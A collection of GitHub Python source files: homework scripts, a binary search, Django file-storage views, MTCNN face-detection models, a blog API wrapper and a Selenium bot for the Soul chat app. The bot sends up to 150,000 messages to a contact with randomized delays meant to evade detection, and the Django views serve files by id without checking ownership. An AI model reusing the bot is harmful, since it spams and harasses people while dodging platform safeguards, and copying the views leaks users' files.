df","repo_name":"ektamishraniu/dataLake-process","sub_path":"dataLake_process/dim_customer_dataA.py","file_name":"dim_customer_dataA.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42042455093","text":"def main():\n\twidth = int(input('Enter the width of the box: '))\n\theight = int(input('Enter the height of the box: '))\n\tsymOut = input('Enter the symbol for the outline: ')\n\tsymIn = input('Enter the symbol to fill in: ')\n\tline = ''\n\tHrange = range(height)\n\tWrange = range(width)\n\tfor y in Hrange:\n\t\tif Hrange[y] == 0 or Hrange[y] == (height - 1):\n\t\t\tline = symOut * width\n\t\t\tprint(line)\n\t\telse:\n\t\t\tline = ''\n\t\t\tfor x in Wrange:\n\t\t\t\tif Wrange[x] == 0 or Wrange[x] == (width - 1):\n\t\t\t\t\tline = line + symOut\n\t\t\t\telse:\n\t\t\t\t\tline = line + symIn\n\t\t\tprint(line)\nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_413.py","file_name":"hw5_413.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36194677394","text":"import json\nfrom .Field import Field\n\n\nclass DataMapping(object):\n\n def __init__(\n self,\n targetId=None,\n targetFieldKey=None,\n typeCode=None\n ):\n \"\"\"\n :param targetId: not required\n :param targetFieldKey: not required\n :param typeCode: not required\n \"\"\"\n self.__targetId = targetId\n self.__targetFieldKey = targetFieldKey\n self.__typeCode = typeCode\n\n @property\n def TargetId(self):\n \"\"\"\n Get the targetId required\n :return:\n \"\"\"\n return self.__targetId\n\n @TargetId.setter\n def TargetId(self, targetId):\n \"\"\"\n Set the __targetId required\n :param __targetId:\n :return:\n \"\"\"\n self.__targetId= targetId\n\n @property\n def TargetFieldKey(self):\n \"\"\"\n Get the targetFieldKey required\n :return:\n \"\"\"\n return self.__targetFieldKey\n\n @TargetFieldKey.setter\n def TargetFieldKey(self, targetFieldKey):\n \"\"\"\n Set the targetFieldKey required\n :param targetFieldKey:\n :return:\n \"\"\"\n self.__targetFieldKey = targetFieldKey\n\n @property\n def TypeCode(self):\n \"\"\"\n Get the typeCode required\n :return:\n \"\"\"\n return self.__typeCode\n\n @TypeCode.setter\n def TypeCode(self, typeCode):\n \"\"\"\n Set the typeCode required\n :param typeCode:\n :return:\n \"\"\"\n self.__typeCode = typeCode\n\n def toJson(self):\n return json.dumps(self.toDictionary())\n\n def toDictionary(self):\n # required properties\n dictionary = {}\n\n # optional properties\n if hasattr(self, 'TargetId'):\n dictionary['TargetId'] = self.TargetId\n\n if hasattr(self, 'TargetFieldKey'):\n dictionary['TargetFieldKey'] = self.TargetFieldKey\n\n if hasattr(self, 'TypeCode'):\n dictionary['TypeCode'] = self.TypeCode\n\n return dictionary\n\n @staticmethod\n def fromJson(jsonObj):\n return DataMapping.fromDictionary(jsonObj)\n\n @staticmethod\n def fromDictionary(content):\n dataMapping = DataMapping()\n\n if not content:\n return dataMapping\n\n if 'TargetId' in content:\n dataMapping.TargetId = content['TargetId'] \n\n if 'TargetFieldKey' in content:\n dataMapping.TargetFieldKey = content['TargetFieldKey'] \n\n if 'TypeCode' in content:\n dataMapping.TypeCode = content['TypeCode']\n\n return dataMapping\n","repo_name":"1561888111qq/OSI-Samples-OCS","sub_path":"library_samples/Python/ocs_sample_library_preview/DataView/DataMapping.py","file_name":"DataMapping.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"11228330100","text":"# Uses python3\nimport sys\n\ndef binary_search(a, x, ans = 0):\n left, right = 0, len(a)\n mid = (left + right)//2\n if right == left:\n return -1\n y = a[mid]\n if y == x:\n return ans + mid\n elif x < y: \n return binary_search(a[left:mid], x, ans)\n elif x > y:\n ans += mid + 1\n return binary_search(a[mid+1:right], x, ans)\n return -1\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n print(binary_search(a, x), end = ' ')\n","repo_name":"attrung/Algorithms","sub_path":"UC San Diego Algorithms/Course1 Algorithm Toolbox/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6734494255","text":"from django.http import Http404, FileResponse\nfrom drf_spectacular.utils import extend_schema, OpenApiResponse\nfrom rest_framework import status, generics, permissions, renderers, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom files.models import UserFile\nfrom files.serializers import (\n UserFileSerializer,\n PublicAccessSetterSerializer,\n DownloadSerializer,\n)\nfrom users.serializers import UserProfileUsedSpaceSerializer\n\n\nclass UserFileListView(generics.ListCreateAPIView):\n def get_queryset(self):\n # after get all files on DB it will be filtered by its owner and return the queryset\n owner_queryset = self.queryset.filter(owner=self.request.user)\n return owner_queryset\n\n queryset = UserFile.objects.get_queryset()\n serializer_class = UserFileSerializer\n permission_classes = (permissions.IsAuthenticated,)\n http_method_names = [\"get\", \"post\"]\n\n def get(self, request):\n queryset = self.get_queryset()\n serializer = UserFileSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n user_file_serializer = UserFileSerializer(data=request.data)\n UserProfile = self.request.user\n for filename in request.FILES:\n file_size = request.FILES[filename].size\n max_disk_space = UserProfile.disk_space\n current_used_space = UserProfile.used_space\n if (max_disk_space - current_used_space) < file_size:\n return Response(\n \"storage limit exceeded\", status=status.HTTP_400_BAD_REQUEST\n )\n new_used_space = current_used_space + file_size\n used_space_serializer = UserProfileUsedSpaceSerializer(\n UserProfile, data={\"used_space\": str(new_used_space)}, partial=True\n )\n if used_space_serializer.is_valid():\n used_space_serializer.save()\n\n if user_file_serializer.is_valid():\n user_file_serializer.save(\n owner=self.request.user,\n )\n return Response(user_file_serializer.data, status=status.HTTP_201_CREATED)\n return Response(user_file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserFileDetailView(generics.GenericAPIView):\n http_method_names = [\"get\", \"delete\", \"patch\"]\n serializer_class = UserFileSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_object(self, file_id):\n try:\n return UserFile.objects.get(file_id=file_id)\n except UserFile.DoesNotExist:\n raise Http404\n\n def get(self, request, file_id):\n UserFile = self.get_object(file_id)\n serializer = UserFileSerializer(UserFile)\n return Response(serializer.data)\n\n @extend_schema(\n summary=\"Set public access for file\",\n methods=[\"patch\"],\n responses={\n 200: OpenApiResponse(\n response=UserFileSerializer, description=\"Created. New user in response\"\n ),\n 400: OpenApiResponse(description=\"Bad request (something invalid)\"),\n },\n request=PublicAccessSetterSerializer\n )\n def patch(self, request, file_id):\n UserFile = self.get_object(file_id)\n serializer = PublicAccessSetterSerializer(\n UserFile, data=request.data, partial=True\n )\n if serializer.is_valid():\n serializer.save()\n return Response(UserFileSerializer(UserFile).data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, file_id):\n UserFile = self.get_object(file_id)\n UserProfile = self.request.user\n file_size = UserFile.filesize\n current_used_space = UserProfile.used_space\n new_used_space = current_used_space - file_size\n used_space_serializer = UserProfileUsedSpaceSerializer(\n UserProfile, data={\"used_space\": str(new_used_space)}, partial=True\n )\n UserFile.delete()\n if used_space_serializer.is_valid():\n used_space_serializer.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PassthroughRenderer(renderers.BaseRenderer):\n \"\"\"\n Return data as-is. View should supply a Response.\n \"\"\"\n\n media_type = \"\"\n format = \"\"\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n return data\n\n\nclass DownloadViewSet(viewsets.ReadOnlyModelViewSet):\n http_method_names = [\"get\"]\n serializer_class = DownloadSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n # after get all files on DB it will be filtered by its owner and return the queryset\n owner_queryset = self.queryset.filter(owner=self.request.user)\n return owner_queryset\n\n def get_object(self, file_id):\n try:\n return UserFile.objects.get(file_id=file_id)\n except UserFile.DoesNotExist:\n raise Http404\n\n @action(methods=[\"get\"], detail=True, renderer_classes=(PassthroughRenderer,))\n def download(self, request, file_id, *args, **kwargs):\n\n UserFile = self.get_object(file_id=file_id)\n # get an open file handle (I'm just using a file attached to the model for this example):\n file_handle = UserFile.file_object.open()\n\n # send file\n response = FileResponse(file_handle, content_type=\"whatever\")\n response[\"Content-Length\"] = UserFile.file_object.size\n response[\"Content-Disposition\"] = (\n 'attachment; filename=\"%s\"' % UserFile.file_object.name\n )\n\n return response\n\n\nclass PublicUserFileViewSet(viewsets.ReadOnlyModelViewSet):\n http_method_names = [\"get\"]\n serializer_class = DownloadSerializer\n\n def get_object(self, public_id):\n try:\n user_file = UserFile.objects.get(public_id=public_id)\n if user_file.public_access:\n print(\"access\")\n return user_file\n raise Http404\n except UserFile.DoesNotExist:\n raise Http404\n\n @action(methods=[\"get\"], detail=True, renderer_classes=(PassthroughRenderer,))\n def download(self, request, public_id, *args, **kwargs):\n\n UserFile = self.get_object(public_id=public_id)\n # get an open file handle (I'm just using a file attached to the model for this example):\n file_handle = UserFile.file_object.open()\n\n # send file\n response = FileResponse(file_handle, content_type=\"whatever\")\n response[\"Content-Length\"] = UserFile.file_object.size\n response[\"Content-Disposition\"] = (\n 'attachment; filename=\"%s\"' % UserFile.file_object.name\n )\n\n return response\n","repo_name":"tsiplenkov/django_cloud_storage","sub_path":"files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26798967453","text":"import tensorflow.keras as keras\nimport tensorflow as tf\nimport numpy as np\nimport cv2\n \n \n \n#处理的12X12网络\ndef Pnet():\n input = tf.keras.Input(shape=[None, None, 3])\n x = tf.keras.layers.Conv2D(10, (3, 3), name='conv1',kernel_regularizer=keras.regularizers.l2(0.0005))(input)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU1')(x)\n x = tf.keras.layers.MaxPooling2D((2, 2))(x)\n x = tf.keras.layers.Conv2D(16, (3, 3),name='conv2',kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU2')(x)\n x = tf.keras.layers.Conv2D(32, (3, 3),name='conv3',kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU3')(x)\n classifier = tf.keras.layers.Conv2D(2, (1, 1), activation='softmax',name='conv4-1')(x)\n #如果input 是大于12*12,[1,2]不为1\n #cls_prob = tf.squeeze(classifier, [1, 2], name='cls_prob')\n bbox_regress = tf.keras.layers.Conv2D(4, (1, 1), name='conv4-2')(x)\n #bbox_pred = tf.squeeze(bbox_regress,[1,2],name='bbox_pred')\n #my code\n landmark_regress = tf.keras.layers.Conv2D(10, (1, 1), name='conv4-3')(x)\n model = tf.keras.models.Model([input], [classifier, bbox_regress, landmark_regress])\n return model\n \n#处理的24X24网络\ndef Rnet():\n \"\"\"定义RNet网络的架构\"\"\"\n input = tf.keras.Input(shape=[24, 24, 3])\n x = tf.keras.layers.Conv2D(28, (3, 3),strides=1,padding='valid',name='conv1')(input)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu1')(x)\n x = tf.keras.layers.MaxPooling2D(pool_size=3,strides=2,padding='same')(x)\n x = tf.keras.layers.Conv2D(48, (3, 3),strides=1,padding='valid',name='conv2')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu2')(x)\n x = tf.keras.layers.MaxPooling2D(pool_size=3,strides=2)(x)\n x = tf.keras.layers.Conv2D(64, (2, 2),strides=1,padding='valid',name='conv3')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu3')(x)\n x = tf.keras.layers.Permute((3, 2, 1))(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(128, name='conv4')(x)\n x = tf.keras.layers.PReLU(name='prelu4')(x)\n classifier = tf.keras.layers.Dense(2,activation='softmax',name='conv5-1')(x)\n bbox_regress = tf.keras.layers.Dense(4, name='conv5-2')(x)\n landmark_regress = tf.keras.layers.Dense(10, name='conv5-3')(x)\n model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n return model\n \n#处理的48X48网络\ndef Onet():\n \"\"\"定义ONet网络的架构\"\"\"\n input = tf.keras.layers.Input(shape=[48, 48, 3])\n # 48,48,3 -> 23,23,32\n x = tf.keras.layers.Conv2D(32, (3, 3),strides=1,padding='valid',name='conv1')(input)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu1')(x)\n x = tf.keras.layers.MaxPool2D(pool_size=3,strides=2,padding='same')(x)\n # 23,23,32 -> 10,10,64\n x = tf.keras.layers.Conv2D(64, (3, 3),strides=1,padding='valid',name='conv2')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu2')(x)\n x = tf.keras.layers.MaxPool2D(pool_size=3,strides=2)(x)\n # 8,8,64 -> 4,4,64\n x = tf.keras.layers.Conv2D(64, (3, 3),strides=1,padding='valid',name='conv3')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu3')(x)\n x = tf.keras.layers.MaxPool2D(pool_size=2)(x)\n # 4,4,64 -> 3,3,128\n x = tf.keras.layers.Conv2D(128, (2, 2),strides=1,padding='valid',name='conv4')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu4')(x)\n # 3,3,128 -> 128,12,12\n x = tf.keras.layers.Permute((3, 2, 1))(x)\n # 1152 -> 256\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(256, name='conv5')(x)\n x = tf.keras.layers.PReLU(name='prelu5')(x)\n # 鉴别\n # 256 -> 2 256 -> 4 256 -> 10\n classifier = tf.keras.layers.Dense(2,activation='softmax',name='conv6-1')(x)\n bbox_regress = tf.keras.layers.Dense(4, name='conv6-2')(x)\n landmark_regress = tf.keras.layers.Dense(10, name='conv6-3')(x)\n #model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n #my code\n model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n return model\n \n \n \n#人脸分类损失函数\ndef cls_ohem(cls_prob, label):\n \n zeros = tf.zeros_like(label, dtype=tf.float32)\n # 若label中的值小于等于0,则为0,否则为1,就是把label中-1变为0\n label_filter_invalid = tf.where(tf.math.less(label,[0]),zeros,label)\n \n ## 类别size[2*batch]\n num_cls_prob = tf.size(cls_prob)\n \n #把cls_porob变成一维\n cls_prob_reshape = tf.reshape(cls_prob,[num_cls_prob,-1])\n label_int = tf.cast(label_filter_invalid,dtype=tf.int32)\n num_row = tf.cast(cls_prob.get_shape()[0],dtype=tf.int32) #[batch]\n \n # 对应某一batch而言,batch*2为非人类别概率,\n # batch*2+1为人概率类别,indices为对应 cls_prob_reshpae\n # 应该的真实值,后续用交叉熵计算损失\n row = tf.range(num_row)*2 #[0 2 4 6]\n #就是如果label是pos就看1X2中的第2个,neg或part就看第1个\n indices_ = row + label_int\n # 从cls_prob_reshape中获取 索引为indices_的值,squeeze后变成一维的长度为batch_size的张量。\n label_prob = tf.squeeze(tf.gather(cls_prob_reshape, indices_))\n #OHEM向前时,全部的Roi通过网络\n loss = -tf.math.log(label_prob+1e-10)\n zeros = tf.zeros_like(label_prob, dtype=tf.float32)\n ones = tf.ones_like(label_prob, dtype=tf.float32)\n \n # 把标签为±1的样本对应的索引设为1,其余设为0 #这一步是用来计算较大的候选RIO 用来OHEM\n valid_inds = tf.where(label < zeros,zeros,ones)\n #获取有效的样本数(即标签为±1 (正样本和负样本的数量)\n num_valid = tf.reduce_sum(valid_inds)\n \n #num_keep_radio = 0.7 选取70%的数据\n keep_num = tf.cast(num_valid*0.7,dtype=tf.int32)\n # \n \n (\"keep_num\",keep_num)\n \n # 只选取neg,pos的70%损失\n #loss = loss * num_valid\n loss = loss * valid_inds\n \n #OHEM就是对loss从高到底排序\n # 反向时,根据排序选择Batch-size/N 个loss值得最大样本来后向传播model的权重\n loss,_ = tf.math.top_k(loss, k=keep_num)\n \n return tf.math.reduce_mean(loss)\n \n \n# 人脸框损失函数\ndef bbox_ohem(bbox_pred,bbox_target,label):\n \n zeros_index = tf.zeros_like(label,dtype=tf.float32)\n ones_index = tf.ones_like(label,dtype=tf.float32)\n \n # 等于±1的有效为1,不等于1的无效为0,即筛选出pos和part的索引-OHEM策略\n valid_inds = tf.where(tf.math.equal(tf.math.abs(label),1),ones_index,zeros_index)\n \n #计算平方差损失\n \n square_error = tf.math.square(bbox_pred - bbox_target) #16-1-16-14\n square_error = tf.math.reduce_sum(square_error,axis=1) #16*16*4\n \n \n # 保留数据的个数\n num_valid = tf.math.reduce_sum(valid_inds)\n keep_num = tf.cast(num_valid,dtype=tf.int32)\n \n if keep_num == 0:\n return tf.constant(0, dtype=tf.float32)\n \n #OHEM策略,保留部分pos,part的损失\n #square_error = square_error * num_valid\n square_error = square_error * valid_inds\n \n # 选出最大的进行反向传播\n _,k_index = tf.math.top_k(square_error,k=keep_num)\n # 将部分pos样本和part样本的平方和提取出来\n square_error = tf.gather(square_error, k_index)\n \n return tf.math.reduce_mean(square_error)\n \n \n#人脸五官损失函数\ndef landmark_ohem(landmark_pred,landmark_target,label):\n #keep label =-2 then do landmark detection\n\n ones = tf.ones_like(label,dtype=tf.float32)\n zeros = tf.zeros_like(label,dtype=tf.float32)\n \n # 只保留landmark数据\n valid_inds = tf.where(tf.equal(label,-2),ones,zeros)\n\n # 计算平方差损失\n square_error = tf.math.square(landmark_pred - landmark_target)\n square_error = tf.math.reduce_sum(square_error,axis=1)\n\n # 保留数据个数\n num_valid = tf.math.reduce_sum(valid_inds) # 0\n keep_num = tf.cast(num_valid, dtype=tf.int32) # 0\n \n if keep_num == 0:\n return tf.constant(0, dtype=tf.float32)\n\n # 保留landmark部分数据损失 \n square_error = square_error * valid_inds\n \n _, k_index = tf.math.top_k(square_error, k=keep_num)\n \n #my code\n square_error = tf.gather(square_error, k_index)\n \n return tf.math.reduce_mean(square_error) # 当square_error为空时会出现nan bug\n \n \n#准确率\ndef cal_accuracy(cls_prob,label):\n \n # 预测最大概率的类别,0代表无人,1代表有人\n pred = tf.argmax(cls_prob,axis=1)\n label_int = tf.cast(label,tf.int64)\n \n #返回pos和neg示例的索引 :按元素返回(x> = y)的真值\n cond = tf.where(tf.greater_equal(label_int,0))\n picked = tf.squeeze(cond)\n #true_label选出picked(pos和neg)坐标\n label_picked = tf.gather(label_int,picked)\n #pre_label选出picked(pos和neg)坐标\n pred_picked = tf.gather(pred,picked)\n \n # accuracy_op = tf.math.reduce_sum(tf.cast(tf.equal(label_picked,pred_picked),dtype=tf.float32))\n # accuracy = tf.math.reduce_mean(tf.cast(tf.math.equal(label_picked, pred_picked), tf.float32))\n return label_picked,pred_picked\n # return accuracy\n","repo_name":"yiiihao/4040_project","sub_path":"mtcnn_model.py","file_name":"mtcnn_model.py","file_ext":"py","file_size_in_byte":9307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30714300117","text":"# Standard library\nimport re\nimport html\nfrom datetime import date\nfrom datetime import datetime\n\n# Packages\nfrom bs4 import BeautifulSoup\nfrom canonicalwebteam import image_template\n\n# Local\nfrom canonicalwebteam.blog import Wordpress\n\n\nclass BlogAPI(Wordpress):\n def __init__(\n self,\n session,\n api_url=\"https://admin.insights.ubuntu.com/wp-json/wp/v2\",\n use_image_template=True,\n thumbnail_width=330,\n thumbnail_height=185,\n ):\n super().__init__(session, api_url)\n\n self.use_image_template = use_image_template\n self.thumbnail_width = thumbnail_width\n self.thumbnail_height = thumbnail_height\n\n def get_articles(\n self,\n tags=None,\n tags_exclude=None,\n exclude=None,\n categories=None,\n sticky=None,\n before=None,\n after=None,\n author=None,\n groups=None,\n per_page=12,\n page=1,\n ):\n articles, metadata = super().get_articles(\n tags,\n tags_exclude,\n exclude,\n categories,\n sticky,\n before,\n after,\n author,\n groups,\n per_page,\n page,\n )\n\n return (\n [self._transform_article(a) for a in articles],\n metadata,\n )\n\n def get_article(self, slug, tags=None, tags_exclude=None):\n article = super().get_article(slug, tags, tags_exclude)\n\n return self._transform_article(article)\n\n def _transform_article(self, article):\n \"\"\"Transform article to include featured image, a group, human readable\n date and a stripped version of the excerpt\n\n :param article: The raw article object\n\n :returns: The transformed article\n \"\"\"\n\n if \"_embedded\" in article:\n article[\"image\"] = article[\"_embedded\"].get(\n \"wp:featuredmedia\", [None]\n )[0]\n article[\"author\"] = article[\"_embedded\"].get(\"author\", [None])[0]\n\n if \"display_category\" not in article:\n categories = article[\"_embedded\"].get(\"wp:term\", [[]])[0]\n\n if categories:\n article[\"display_category\"] = categories[-1]\n\n if (\n \"wp:term\" in article[\"_embedded\"]\n and article[\"_embedded\"][\"wp:term\"][3]\n ):\n article[\"group\"] = article[\"_embedded\"][\"wp:term\"][3][0]\n\n if \"date_gmt\" in article:\n article_gmt = article[\"date_gmt\"]\n article_date = datetime.strptime(article_gmt, \"%Y-%m-%dT%H:%M:%S\")\n article[\"date\"] = article_date.strftime(\"%-d %B %Y\")\n\n if \"excerpt\" in article and \"rendered\" in article[\"excerpt\"]:\n article[\"excerpt\"][\"raw\"] = self._strip_excerpt(\n article[\"excerpt\"][\"rendered\"]\n )[:340]\n\n # If the excerpt doesn't end before 340 characters, add ellipsis\n raw_article = article[\"excerpt\"][\"raw\"]\n # split at the last 3 characters\n raw_article_start = raw_article[:-3]\n raw_article_end = raw_article[-3:]\n # for the last 3 characters replace any part of […]\n raw_article_end = raw_article_end.replace(\"[\", \"\")\n raw_article_end = raw_article_end.replace(\"…\", \"\")\n raw_article_end = raw_article_end.replace(\"]\", \"\")\n # join it back up\n article[\"excerpt\"][\"raw\"] = \"\".join(\n [raw_article_start, raw_article_end, \" […]\"]\n )\n\n if (\n article.get(\"_start_month\")\n and article.get(\"_start_year\")\n and article.get(\"_start_day\")\n ):\n start_month_name = self._get_month_name(\n int(article[\"_start_month\"])\n )\n article[\"start_date\"] = \"{} {} {}\".format(\n article[\"_start_day\"], start_month_name, article[\"_start_year\"]\n )\n\n if (\n article.get(\"_end_month\")\n and article.get(\"_end_year\")\n and article.get(\"_end_day\")\n ):\n end_month_name = self._get_month_name(int(article[\"_end_month\"]))\n article[\"end_date\"] = \"{} {} {}\".format(\n article[\"_end_day\"], end_month_name, article[\"_end_year\"]\n )\n if \"content\" in article:\n # replace url on the blog article page\n article[\"content\"][\"rendered\"] = self._replace_url(\n article[\"content\"][\"rendered\"]\n )\n\n if (\n \"image\" in article\n and article[\"image\"] is not None\n and \"source_url\" in article[\"image\"]\n ):\n # replace url from the image thumbnail\n article[\"image\"][\"source_url\"] = self._replace_url(\n article[\"image\"][\"source_url\"]\n )\n\n # create default rendered image\n article[\"image\"][\"rendered\"] = (\n ''\n )\n\n if self.use_image_template:\n if \"content\" in article:\n # apply image template for blog article images\n article[\"content\"][\"rendered\"] = self._apply_image_template(\n content=article[\"content\"][\"rendered\"],\n width=720,\n )\n\n if \"image\" in article:\n # apply image template to thumbnail image\n if (\n article[\"image\"] is not None\n and \"source_url\" in article[\"image\"]\n ):\n article[\"image\"][\"rendered\"] = self._apply_image_template(\n content=article[\"image\"][\"rendered\"],\n width=self.thumbnail_width,\n height=self.thumbnail_height,\n use_e_sharpen=True,\n )\n\n return article\n\n def _replace_url(self, content):\n \"\"\"Change insights url to ubuntu.com\n\n :param content: String to replace url\n\n :returns: A string with converted urls\n \"\"\"\n\n url = \"admin.insights.ubuntu.com/wp-content/uploads\"\n new_url = \"ubuntu.com/wp-content/uploads\"\n\n return content.replace(url, new_url)\n\n def _strip_excerpt(self, raw_html):\n \"\"\"Remove tags from a html string\n\n :param raw_html: The HTML to strip\n\n :returns: The stripped string\n \"\"\"\n clean_regex = re.compile(\"<.*?>\")\n clean_text = re.sub(clean_regex, \"\", raw_html)\n return html.unescape(clean_text).replace(\"\\n\", \"\")\n\n def _get_month_name(self, month_index):\n \"\"\"\n Get the month name from it's number, e.g.:\n January\n \"\"\"\n\n return date(1900, month_index, 1).strftime(\"%B\")\n\n def _apply_image_template(\n self, content, width, height=None, use_e_sharpen=False\n ):\n \"\"\"Apply image template to the img tags\n\n :param content: String to replace url\n :param width: Default width of the image\n :param height: Default height of the image\n\n :returns: HTML images templated\n \"\"\"\n\n soup = BeautifulSoup(content, \"html.parser\")\n for image in soup.findAll(\"img\"):\n if not image.get(\"src\") or \"http\" not in image.get(\"src\"):\n continue\n\n img_width = (\n image.get(\"width\")\n if image.get(\"width\") is not None\n and image.get(\"width\").isdigit()\n else None\n )\n\n img_height = (\n image.get(\"height\")\n if image.get(\"height\") is not None\n and image.get(\"height\").isdigit()\n else None\n )\n\n new_image = BeautifulSoup(\n image_template(\n url=image.get(\"src\"),\n alt=\"\",\n width=img_width or width,\n height=img_height or height,\n hi_def=True,\n fill=True,\n e_sharpen=use_e_sharpen,\n loading=\"lazy\",\n ),\n \"html.parser\",\n )\n image.replace_with(new_image)\n\n return str(soup)\n","repo_name":"canonical/canonicalwebteam.blog","sub_path":"canonicalwebteam/blog/blog_api.py","file_name":"blog_api.py","file_ext":"py","file_size_in_byte":8343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30472603552","text":"from selenium import webdriver\r\nimport time\r\nimport random\r\n\r\n# 创建 WebDriver 对象,指明使用chrome浏览器驱动\r\nwd = webdriver.Chrome(executable_path=\"chromedriver.exe\")\r\nwd.get('https://chat.soulapp.cn/')\r\n\r\n# 扫描二维码的时间\r\ntime.sleep(20)\r\n\r\n# 点击第一个联系人\r\nwd.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[1]/div/div[3]/div/div[1]').click()\r\n\r\n# 获取输入框\r\nSendBox = wd.find_element_by_xpath('//*[@id=\"input\"]')\r\n\r\n# ��取发送button\r\nSendButton = wd.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[2]/div/div/div[3]/div[3]/div')\r\n\r\n# 定义判断数\r\nnumber = 0\r\n\r\n# 循环输入,并发送\r\nfor i in range(0, 150000):\r\n # 消息发送 执行\r\n begin = time.time()\r\n\r\n if number < 8:\r\n SendBox.send_keys(random.choice(['我不能给你全世界,但是,我的全世界全都给你',\r\n '春风十里不如你,愿有岁月可回首,且以深情共白头',\r\n '我曾做过最好的事就是对你一如既往的坚持',\r\n '有的人说不清哪里好,但就是谁都替代不了',\r\n '不是我执着,而是你值得',\r\n '其实你不喜欢我,我也不会死,但是如果你肯喜欢我,我一定会非常非常勇敢地活下去',\r\n '每个人心中都有一团火, 路过的人只能看到烟。 但是总有一个人, 总有那么一个人能看到这火, 然后走过来陪我一起',\r\n '没遇见你之前,我没想过结婚这事,遇见你之后,结婚这事我没想过别人',\r\n '有人问我你究竟哪里好,这么多年我还忘不了,春风再美也比不上你的笑,没见过你的人不会明了',\r\n '我还在努力,你先不要喜欢其他人',\r\n '和你在一起的时刻都很美好,因为天气好,因为天气不好,因为天气刚刚好',\r\n '当有人说到幸福二字时,我满脑子都是我们',\r\n '一想到你,我对整个世界都很温柔',\r\n '我爱你没变,变的是我更爱你了',\r\n '你一声不离,换我余生不弃',\r\n '我想要的很简单,时光还在,你还在',\r\n '你永远也看不到我最寂寞时候的样子,因为只有你不在我身边的时候,我才最寂寞',\r\n '有那么多事情我无能为力,比如生老病死,比如时光流逝,比如我爱你',\r\n '林深时见鹿,海蓝时见鲸,梦醒时见你',\r\n '未经允许,擅自喜欢你,特别不好意思']))\r\n else:\r\n SendBox.send_keys(random.randint(9999, 99999))\r\n SendButton.click()\r\n\r\n # 记录时间\r\n Tic = time.time()\r\n # 设置延迟时间防检测\r\n time.sleep(random.uniform(1, 3))\r\n # 记录时间\r\n Toc = time.time()\r\n # 消息发送 结束\r\n end = time.time()\r\n # 总时间\r\n TIME = end - begin\r\n\r\n if TIME < 10 and number < 8:\r\n number = 0\r\n else:\r\n number += 1\r\n\r\n print(\"成功发送第 %d 条消息,休眠时差%f秒,发送总时间%f秒,超时计数%d次\" % (i + 1, (Toc - Tic), TIME, number))\r\n","repo_name":"Juan-Chen-BNUZ/soul-auto","sub_path":"venv/soul/soulSend.py","file_name":"soulSend.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34671233702","text":"import os, pwd, sys, optparse, socket, time, o2tf, pdb, config\n#\nlogfile = config.LOGFILE\n#\nUsage = 'Usage: %prog [--Debug] \\\n[-l|--label label] \\\n[-m|--mountpoint mountpoint] \\\n[-o|--options mountoptions] \\\n[--mount] \\\n[--umount]'\n#\nif __name__=='__main__':\n\tparser = optparse.OptionParser(Usage)\n#\n\tparser.add_option('--Debug',\n\t\taction=\"store_true\",\n\t\tdest='DEBUGON',\n\t\tdefault=False)\n#\n\tparser.add_option('-l', \n\t\t'--label', \n\t\tdest='label', \n\t\ttype='string', \n\t\thelp='Label of the partition to be mounted.')\n#\n\tparser.add_option('--mount',\n\t\taction=\"store_true\",\n\t\tdest='domount',\n\t\tdefault=False)\n#\n\tparser.add_option('-m', \n\t\t'--mountpoint', 